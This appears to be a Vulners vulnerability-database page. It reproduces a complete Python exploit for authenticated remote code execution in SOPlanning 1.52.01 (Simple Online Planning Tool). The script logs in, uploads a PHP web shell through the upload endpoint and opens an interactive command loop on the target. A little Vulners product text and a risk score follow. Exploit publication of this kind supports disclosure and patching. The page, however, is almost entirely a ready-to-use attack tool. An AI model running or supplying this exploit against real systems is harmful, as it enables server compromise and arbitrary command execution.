Vulners
Lucene search
SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (Authenticated) Exploit
# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
# Date: 6th October, 2024
# Exploit Author: Ardayfio Samuel Nii Aryee
# Version: 1.52.01
# Tested on: Ubuntu
import argparse
import requests
import random
import string
import urllib.parse
def command_shell(exploit_url):
commands = input("soplaning:~$ ")
encoded_command = urllib.parse.quote_plus(commands)
command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
if command_res.status_code == 200:
print(f"{command_res.text}")
return
print(f"Error: An erros occured while running command: {encoded_command}")
def exploit(username, password, url):
target_url = f"{url}/process/login.php"
upload_url = f"{url}/process/upload.php"
link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"
login_data = {"login":username,"password":password}
res = requests.post(target_url, data=login_data, allow_redirects=False)
cookies = res.cookies
multipart_form_data = {
"linkid": link_id,
"periodeid": 0,
"fichiers": php_filename,
"type": "upload"
}
web_shell = "<?php system($_GET['cmd']); ?>"
files = {
'fichier-0': (php_filename, web_shell, 'application/x-php')
}
upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)
if upload_res.status_code == 200 and "File" in upload_res.text:
print(f"[+] Uploaded ===> {upload_res.text}")
print("[+] Exploit completed.")
exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
print(f"Access webshell here: {exploit_url}?cmd=<command>")
if "yes" == input("Do you want an interactive shell? (yes/no) "):
try:
while True:
command_shell(exploit_url)
except Exception as e:
raise(f"Error: {e}")
else:
pass
def main():
parser = argparse.ArgumentParser(prog="SOplanning RCE", \
usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
parser.add_argument("-u", "--username",type=str,help="username", required=True)
parser.add_argument("-p", "--password",type=str,help="password", required=True)
args = parser.parse_args()
exploit(args.username, args.password, args.target)
main()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Nov 2024 00:00Current
7.4High risk
Vulners AI Score7.4